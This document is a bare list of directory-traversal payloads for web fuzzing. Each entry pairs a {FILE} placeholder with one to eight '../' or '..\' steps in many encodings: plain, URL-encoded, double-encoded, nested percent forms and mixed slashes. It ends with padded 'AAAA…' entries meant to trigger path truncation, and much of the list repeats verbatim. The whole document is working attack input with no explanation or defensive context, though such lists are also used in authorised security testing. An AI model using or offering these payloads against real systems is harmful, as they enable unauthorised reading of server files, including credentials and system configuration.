%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}
 +
..%%35%63{FILE}
 +
..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
 +
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}
 +
%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}
 +
%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}
 +
../{FILE}
 +
../../{FILE}
 +
../../../{FILE}
 +
../../../../{FILE}
 +
../../../../../{FILE}
 +
../../../../../../{FILE}
 +
../../../../../../../{FILE}
 +
../../../../../../../../{FILE}
 +
..%2f{FILE}
 +
..%2f..%2f{FILE}
 +
..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
..%252f{FILE}
 +
..%252f..%252f{FILE}
 +
..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
..\{FILE}
 +
..\..\{FILE}
 +
..\..\..\{FILE}
 +
..\..\..\..\{FILE}
 +
..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\..\{FILE}
 +
..%5c{FILE}
 +
..%5c..%5c{FILE}
 +
..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
..%255c{FILE}
 +
..%255c..%255c{FILE}
 +
..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
../{FILE}
 +
../../{FILE}
 +
../../../{FILE}
 +
../../../../{FILE}
 +
../../../../../{FILE}
 +
../../../../../../{FILE}
 +
../../../../../../../{FILE}
 +
../../../../../../../../{FILE}
 +
..%2f{FILE}
 +
..%2f..%2f{FILE}
 +
..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}
 +
%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}
 +
%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
..%252f{FILE}
 +
..%252f..%252f{FILE}
 +
..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}
 +
%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}
 +
%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}
 +
..\{FILE}
 +
..\..\{FILE}
 +
..\..\..\{FILE}
 +
..\..\..\..\{FILE}
 +
..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\{FILE}
 +
..\..\..\..\..\..\..\..\{FILE}
 +
..%5c{FILE}
 +
..%5c..%5c{FILE}
 +
..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}
 +
%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}
 +
%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
..%255c{FILE}
 +
..%255c..%255c{FILE}
 +
..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}
 +
%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}
 +
%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}
 +
\../{FILE}
 +
\../\../{FILE}
 +
\../\../\../{FILE}
 +
\../\../\../\../{FILE}
 +
\../\../\../\../\../{FILE}
 +
\../\../\../\../\../\../{FILE}
 +
\../\../\../\../\../\../\../{FILE}
 +
\../\../\../\../\../\../\../\../{FILE}
 +
/..\{FILE}
 +
/..\/..\{FILE}
 +
/..\/..\/..\{FILE}
 +
/..\/..\/..\/..\{FILE}
 +
/..\/..\/..\/..\/..\{FILE}
 +
/..\/..\/..\/..\/..\/..\{FILE}
 +
/..\/..\/..\/..\/..\/..\/..\{FILE}
 +
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}
 +
